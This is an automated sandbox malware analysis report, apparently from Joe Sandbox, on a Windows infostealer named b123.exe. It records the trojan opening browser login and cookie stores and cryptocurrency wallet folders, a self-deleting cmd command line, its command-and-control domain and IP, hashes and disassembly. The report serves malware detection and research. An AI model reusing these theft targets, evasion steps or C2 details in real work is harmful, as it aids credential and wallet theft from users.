        Source: C:\Users\user\Desktop\b123.exeCode function: 0_2_00401280 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
        Source: C:\Users\user\Desktop\b123.exeCode function: 0_2_00401090 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
        Source: C:\Users\user\Desktop\b123.exeCode function: 0_2_0040A150 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
        Source: C:\Users\user\Desktop\b123.exeCode function: 0_2_0040B570 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,
        Source: C:\Users\user\Desktop\b123.exeCode function: 0_2_00407620 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
        Source: C:\Users\user\Desktop\b123.exeCode function: 0_2_0040B110 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
        Source: C:\Users\user\Desktop\b123.exeCode function: 0_2_0040B3A0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
        Source: C:\Users\user\Desktop\b123.exeAPI call chain: ExitProcess graph end node
        Source: C:\Users\user\Desktop\b123.exeAPI call chain: ExitProcess graph end node
        Source: C:\Users\user\Desktop\b123.exeAPI call chain: ExitProcess graph end node
        Source: C:\Users\user\Desktop\b123.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
        Source: C:\Users\user\Desktop\b123.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
        Source: C:\Users\user\Desktop\b123.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
        Source: C:\Users\user\Desktop\b123.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
        Source: C:\Users\user\Desktop\b123.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
        Source: C:\Users\user\Desktop\b123.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
        Source: C:\Users\user\Desktop\b123.exeCode function: 0_2_004054F0 VirtualProtect ?,00000004,00000100,00000000
        Source: C:\Users\user\Desktop\b123.exeCode function: 0_2_00415FC0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,
        Source: C:\Users\user\Desktop\b123.exeCode function: 0_2_00406040 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetSetOptionA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,
        Source: C:\Users\user\Desktop\b123.exeCode function: 0_2_00415E60 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\b123.exeCode function: 0_2_00401000 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\b123.exeMemory protected: page execute read | page execute and read and write | page guard
        Source: C:\Users\user\Desktop\b123.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\Desktop\b123.exe" & exit
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 5
        Source: C:\Users\user\Desktop\b123.exeCode function: GetProcessHeap,RtlAllocateHeap,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,wsprintfA,wsprintfA,memset,LocalFree,
        Source: C:\Users\user\Desktop\b123.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
        Source: C:\Users\user\Desktop\b123.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
        Source: C:\Users\user\Desktop\b123.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
        Source: C:\Users\user\Desktop\b123.exeCode function: 0_2_0040CE40 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,
        Source: C:\Users\user\Desktop\b123.exeCode function: 0_2_0040CEA0 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,
        Source: C:\Users\user\Desktop\b123.exeCode function: 0_2_004084E0 GetVersionExA,LoadLibraryA,WideCharToMultiByte,lstrlen,WideCharToMultiByte,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,WideCharToMultiByte,lstrcat,lstrcat,lstrcat,WideCharToMultiByte,lstrcat,lstrcat,lstrcat,lstrcat,WideCharToMultiByte,lstrcat,FreeLibrary,
        Source: C:\Users\user\Desktop\b123.exeCode function: 0_2_0040CE00 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: 00000000.00000002.454190962.0000000002070000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.453604770.00000000005DA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: C:\Users\user\Desktop\b123.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
        Source: C:\Users\user\Desktop\b123.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
        Source: C:\Users\user\Desktop\b123.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
        Source: C:\Users\user\Desktop\b123.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\
        Source: C:\Users\user\Desktop\b123.exeFile opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
        Source: C:\Users\user\Desktop\b123.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
        Source: C:\Users\user\Desktop\b123.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
        Source: C:\Users\user\Desktop\b123.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
        Source: C:\Users\user\Desktop\b123.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
        Source: Yara matchFile source: 00000000.00000002.453604770.00000000005DA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: 00000000.00000002.454190962.0000000002070000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.453604770.00000000005DA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid Accounts31
        Native API
        Path Interception11
        Process Injection
        11
        Disable or Modify Tools
        1
        OS Credential Dumping
        2
        System Time Discovery
        Remote Services1
        Archive Collected Data
        Exfiltration Over Other Network Medium3
        Ingress Tool Transfer
        Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
        Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
        Deobfuscate/Decode Files or Information
        LSASS Memory1
        Account Discovery
        Remote Desktop Protocol2
        Data from Local System
        Exfiltration Over Bluetooth2
        Encrypted Channel
        Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)2
        Obfuscated Files or Information
        Security Account Manager3
        File and Directory Discovery
        SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration4
        Non-Application Layer Protocol
        Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)43
        Software Packing
        NTDS134
        System Information Discovery
        Distributed Component Object ModelInput CaptureScheduled Transfer14
        Application Layer Protocol
        SIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
        File Deletion
        LSA Secrets1
        Query Registry
        SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
        Replication Through Removable MediaLaunchdRc.commonRc.common1
        Masquerading
        Cached Domain Credentials12
        Security Software Discovery
        VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
        External Remote ServicesScheduled TaskStartup ItemsStartup Items1
        Virtualization/Sandbox Evasion
        DCSync1
        Virtualization/Sandbox Evasion
        Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job11
        Process Injection
        Proc Filesystem1
        Process Discovery
        Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
        Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow1
        System Owner/User Discovery
        Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
        Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork Sniffing1
        Remote System Discovery
        Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        b123.exe33%ReversingLabsWin32.Trojan.Zenpak
        b123.exe100%Joe Sandbox ML
        No Antivirus matches
        SourceDetectionScannerLabelLinkDownload
        0.2.b123.exe.20b0000.1.unpack100%AviraTR/Patched.Ren.GenDownload File
        0.2.b123.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
        No Antivirus matches
        SourceDetectionScannerLabelLink
        http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
        http://ocsp.sectigo.com00%URL Reputationsafe
        http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
        https://sectigo.com/CPS0D0%URL Reputationsafe
        http://sughicent.com/blaka.php0%Avira URL Cloudsafe
        http://sughicent.com/request100%Avira URL Cloudmalware
        NameIPActiveMaliciousAntivirus DetectionReputation
        sughicent.com
        5.63.155.126
        truetrue
          unknown
          NameMaliciousAntivirus DetectionReputation
          http://sughicent.com/blaka.phptrue
          • Avira URL Cloud: safe
          unknown
          http://sughicent.com/requesttrue
          • Avira URL Cloud: malware
          unknown
          NameSourceMaliciousAntivirus DetectionReputation
          https://ac.ecosia.org/autocomplete?q=4OZ5FKFU.0.drfalse
            high
            http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0tb123.exefalse
            • URL Reputation: safe
            unknown
            https://duckduckgo.com/chrome_newtab4OZ5FKFU.0.drfalse
              high
              https://duckduckgo.com/ac/?q=4OZ5FKFU.0.drfalse
                high
                https://www.google.com/images/branding/product/ico/googleg_lodp.ico4OZ5FKFU.0.drfalse
                  high
                  http://ocsp.sectigo.com0b123.exefalse
                  • URL Reputation: safe
                  unknown
                  http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#b123.exefalse
                  • URL Reputation: safe
                  unknown
                  https://sectigo.com/CPS0Db123.exefalse
                  • URL Reputation: safe
                  unknown
                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=4OZ5FKFU.0.drfalse
                    high
                    https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search4OZ5FKFU.0.drfalse
                      high
                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=4OZ5FKFU.0.drfalse
                        high
                        https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=4OZ5FKFU.0.drfalse
                          high
                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs
                          IPDomainCountryFlagASNASN NameMalicious
                          5.63.155.126
                          sughicent.comRussian Federation
                          197695AS-REGRUtrue
                          Joe Sandbox Version:34.0.0 Boulder Opal
                          Analysis ID:594632
                          Start date and time:2022-03-22 22:50:46 +01:00
                          Joe Sandbox Product:CloudBasic
                          Overall analysis duration:0h 5m 30s
                          Hypervisor based Inspection enabled:false
                          Report type:light
                          Sample file name:b123.exe
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                          Number of analysed new started processes analysed:5
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • HDC enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Detection:MAL
                          Classification:mal100.troj.spyw.evad.winEXE@6/4@1/1
                          EGA Information:
                          • Successful, ratio: 100%
                          HDC Information:
                          • Successful, ratio: 97.2% (good quality ratio 88.7%)
                          • Quality average: 82.2%
                          • Quality standard deviation: 31.7%
                          HCA Information:
                          • Successful, ratio: 99%
                          • Number of executed functions: 0
                          • Number of non-executed functions: 0
                          Cookbook Comments:
                          • Adjust boot time
                          • Enable AMSI
                          • Found application associated with file extension: .exe
                          • Stop behavior analysis, all processes terminated
                          • Exclude process from analysis (whitelisted): svchost.exe
                          • TCP Packets have been reduced to 100
                          • Excluded IPs from analysis (whitelisted): 23.211.6.115, 80.67.82.211, 80.67.82.235
                          • Excluded domains from analysis (whitelisted): e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, store-images.s-microsoft.com-c.edgekey.net, img-prod-cms-rt-microsoft-com.akamaized.net, a1449.dscg2.akamai.net
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size getting too big, too many NtOpenFile calls found.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • VT rate limit hit for: b123.exe
                          TimeTypeDescription
                          23:52:02API Interceptor1x Sleep call for process: b123.exe modified
                          No context
                          No context
                          No context
                          No context
                          No context
                          Process:C:\Users\user\Desktop\b123.exe
                          File Type:SQLite 3.x database, last written using SQLite version 3032001
                          Category:dropped
                          Size (bytes):73728
                          Entropy (8bit):1.1874185457069584
                          Encrypted:false
                          SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                          MD5:72A43D390E478BA9664F03951692D109
                          SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                          SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                          SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                          Malicious:false
                          Reputation:high, very likely benign file
                          Preview:SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Users\user\Desktop\b123.exe
                          File Type:SQLite 3.x database, last written using SQLite version 3032001
                          Category:dropped
                          Size (bytes):20480
                          Entropy (8bit):0.698304057893793
                          Encrypted:false
                          SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBoIL4rtEy80:T5LLOpEO5J/Kn7U1uBoI+j
                          MD5:3806E8153A55C1A2DA0B09461A9C882A
                          SHA1:BD98AB2FB5E18FD94DC24BCE875087B5C3BB2F72
                          SHA-256:366E8B53CE8CC27C0980AC532C2E9D372399877931AB0CEA075C62B3CB0F82BE
                          SHA-512:31E96CC89795D80390432062466D542DBEA7DF31E3E8676DF370381BEDC720948085AD495A735FBDB75071DE45F3B8E470D809E863664990A79DEE8ADC648F1C
                          Malicious:false
                          Reputation:high, very likely benign file
                          Preview:SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Users\user\Desktop\b123.exe
                          File Type:SQLite 3.x database, last written using SQLite version 3032001
                          Category:dropped
                          Size (bytes):118784
                          Entropy (8bit):0.4507667042986948
                          Encrypted:false
                          SSDEEP:96:V/WU+bDoYysX0uhnydVjN9DLjGQLBE3u:V/l+bDo3irhnydVj3XBBE3u
                          MD5:8D1E4EF2C47505BE17244F97D8591000
                          SHA1:09EC63BD44834AC76F888D87C0A358532665D8B6
                          SHA-256:A395EB3FFB419984F33F2AC9EE04A6257730A4600580812A5518957F50BB6D88
                          SHA-512:B7EB3FE94FF62DD8D6BFEF55C0D79ABB2DAC65E30757E016B37CF78F29C27BDE89D0798CD21357B438EE4007D917AD830A11521DA3DC5C1988D73CBD9990FCD1
                          Malicious:false
                          Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Users\user\Desktop\b123.exe
                          File Type:SQLite 3.x database, last written using SQLite version 3032001
                          Category:dropped
                          Size (bytes):40960
                          Entropy (8bit):0.792852251086831
                          Encrypted:false
                          SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                          MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                          SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                          SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                          SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                          Malicious:false
                          Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Entropy (8bit):7.3696021074244396
                          TrID:
                          • Win32 Executable (generic) a (10002005/4) 99.94%
                          • Win16/32 Executable Delphi generic (2074/23) 0.02%
                          • Generic Win/DOS Executable (2004/3) 0.02%
                          • DOS Executable Generic (2002/1) 0.02%
                          • VXD Driver (31/22) 0.00%
                          File name:b123.exe
                          File size:235352
                          MD5:2e89a7aae558e9be86042e2bd7e65803
                          SHA1:64e85269651f0a475d0a94eb98cd3adbf3061e10
                          SHA256:7022a16d455a3ad78d0bbeeb2793cb35e48822c3a0a8d9eaa326ffc91dd9e625
                          SHA512:333d17a364c4e3b226de86dfb3cc2b74684c4a37a30d3e690ca69c4be2119f4f4184ea59c7557cfccf4ce78f8c3bc67f0a4360fd465cd8bb44808ab4ccb07f1b
                          SSDEEP:3072:iq0Je2P1VU4W3gwbBPWq3rZP55Zu3DtYyprz8gJy436s+OssN+uQSYftoyQ4tpvG:iq0rnURb0K742Ajx3qSYe94tpvURSYOc
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...................................p.............@.................................u......................................
                          Icon Hash:c4b2b2b0d4f8f4c2
                          Entrypoint:0x42aa70
                          Entrypoint Section:.text
                          Digitally signed:true
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                          DLL Characteristics:
                          Time Stamp:0x1BAAC59D [Sun Sep 16 09:55:41 1984 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:4
                          OS Version Minor:0
                          File Version Major:4
                          File Version Minor:0
                          Subsystem Version Major:4
                          Subsystem Version Minor:0
                          Import Hash:bae10aaa9e80d644f79420466068cc74
                          Signature Valid:
                          Signature Issuer:
                          Signature Validation Error:
                          Error Number:
                          Not Before, Not After
                            Subject Chain
                              Version:
                              Thumbprint MD5:
                              Thumbprint SHA-1:
                              Thumbprint SHA-256:
                              Serial:
                              Instruction
                              push ebp
                              mov ebp, esp
                              push 0042F07Ch
                              call dword ptr [0042FD10h]
                              push 0042F088h
                              call dword ptr [0042FD10h]
                              push 0042F094h
                              call dword ptr [0042FD10h]
                              push 0042F0A0h
                              call dword ptr [0042FD10h]
                              push 0042F0ACh
                              call dword ptr [0042FD10h]
                              push 0042F0B8h
                              call dword ptr [0042FD10h]
                              push 00000000h
                              push 00000000h
                              push 00000000h
                              push 00000000h
                              call dword ptr [0042F8D8h]
                              push eax
                              call 00007FBBACE0122Ch
                              push eax
                              call dword ptr [0042FA28h]
                              pop ebp
                              ret
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              push ebp
                              mov ebp, esp
                              push ecx
                              push ebx
                              mov eax, dword ptr [004322D8h]
                              mov dword ptr [004322DCh], eax
                              mov ecx, dword ptr [004322E0h]
                              mov edx, dword ptr [ecx]
                              mov dword ptr [004322E4h], edx
                              mov eax, dword ptr [004322DCh]
                              sub eax, 0Bh
                              mov dword ptr [004322DCh], eax
                              mov edx, dword ptr [004322DCh]
                              add edx, 0Bh
                              push dword ptr [004322E4h]
                              pop dword ptr [ebp-04h]
                              mov ecx, edx
                              mov ebx, dword ptr [ebp-04h]
                              xor ebx, ecx
                              mov eax, ebx
                              mov dword ptr [004322E4h], 00000000h
                              add dword ptr [004322E4h], eax
                              mov ecx, dword ptr [000000E0h]
                              NameVirtual AddressVirtual Size Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IMPORT0x2f0d00x50.data
                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x330000x7ce8.rsrc
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                              IMAGE_DIRECTORY_ENTRY_SECURITY0x382000x1558.rsrc
                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IAT0x2f8d40x7b4.data
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                              .text0x10000x2c70e0x2c800False0.817404757725data7.5186416062IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                              .rdata0x2e0000x3e80x400False0.0166015625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .data0x2f0000x32fc0x3400False0.376953125data5.63964586444IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                              .rsrc0x330000x8ce80x7e00False0.373759920635data6.00867160608IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              NameRVASizeTypeLanguageCountry
                              RT_ICON0x333400x668dataEnglishUnited States
                              RT_ICON0x339a80x2e8dataEnglishUnited States
                              RT_ICON0x33c900x1e8dataEnglishUnited States
                              RT_ICON0x33e780x128GLS_BINARY_LSB_FIRSTEnglishUnited States
                              RT_ICON0x33fa00xea8dataEnglishUnited States
                              RT_ICON0x34e480x8a8dataEnglishUnited States
                              RT_ICON0x356f00x6c8dataEnglishUnited States
                              RT_ICON0x35db80x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                              RT_ICON0x363200x25a8dataEnglishUnited States
                              RT_ICON0x388c80x10a8dataEnglishUnited States
                              RT_ICON0x399700x988dataEnglishUnited States
                              RT_ICON0x3a2f80x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                              RT_RCDATA0x3a7600x173XML 1.0 document, ASCII textEnglishUnited States
                              RT_GROUP_ICON0x3a8d40xaedataEnglishUnited States
                              RT_VERSION0x3a9840x364dataEnglishUnited States
                              DLLImport
                              KERNEL32.dllLoadLibraryW, GetModuleHandleW, FreeLibrary, GetProcAddress, GetTickCount, CreateEventW, GetCurrentProcessId, CloseHandle, WaitForSingleObject, GetThreadLocale, CreateDirectoryW, GetSystemWindowsDirectoryW, FindClose, FindFirstFileW, OpenProcess, Process32NextW, Process32FirstW, CreateToolhelp32Snapshot, GetModuleFileNameW, InterlockedIncrement, GlobalMemoryStatusEx, GetVersionExW, VerifyVersionInfoW, VerSetConditionMask, GetCurrentProcess, GetNativeSystemInfo, GetLastError, CreateFileW, GetSystemDirectoryW, CreateProcessW, lstrlenW, GetEnvironmentVariableW, GetWindowsDirectoryW, LocalFree, LocalAlloc, FormatMessageW, GetLongPathNameW, GetShortPathNameW, InterlockedDecrement, GetTempPathW, GetLocalTime, OutputDebugStringW, GetCurrentThreadId, GetModuleHandleExW, GetExitCodeProcess, GetFileAttributesW, lstrlenA, WriteConsoleW, FlushFileBuffers, HeapSize, CompareStringW, LCMapStringW, QueryPerformanceCounter, ReadFile, GetProcessHeap, SetEndOfFile, SetFilePointer, GetConsoleMode, GetConsoleCP, SetStdHandle, SetHandleCount, Sleep, SetEnvironmentVariableW, SetEnvironmentVariableA, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetStdHandle, WriteFile, HeapCreate, IsProcessorFeaturePresent, InterlockedExchange, LoadLibraryA, RaiseException, FileTimeToSystemTime, FileTimeToLocalFileTime, GetDriveTypeW, FindFirstFileExW, WideCharToMultiByte, GetSystemTimeAsFileTime, HeapFree, HeapReAlloc, HeapAlloc, GetStringTypeW, ExitProcess, DecodePointer, RtlUnwind, EnterCriticalSection, LeaveCriticalSection, DeleteFileW, GetFileType, MultiByteToWideChar, GetTimeFormatW, GetDateFormatW, GetTimeZoneInformation, GetCommandLineW, HeapSetInformation, GetStartupInfoW, GetFullPathNameW, GetFileInformationByHandle, PeekNamedPipe, GetCurrentDirectoryW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, EncodePointer, TerminateProcess, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, GetVolumeInformationA, GetModuleFileNameA, GetOverlappedResult, CreateEventA, GlobalReAlloc, GetFileTime, SetFileTime, SystemTimeToFileTime, GetCurrentThread, GlobalMemoryStatus, GetSystemInfo, GetExitCodeThread, TerminateThread, CreateThread, GetDiskFreeSpaceA, GetCommandLineA, CreateMutexA, ReleaseMutex, OpenEventA, ResetEvent, GetFileAttributesA, lstrcatA, GetVersionExA, GetModuleHandleA, GetComputerNameA, GetPrivateProfileIntA, GetUserDefaultLangID, GetPrivateProfileSectionA, GetSystemDirectoryA, VirtualAlloc, VirtualFree, FindFirstFileA, MoveFileExA, RemoveDirectoryA, FindNextFileA, GlobalAlloc, GlobalLock, 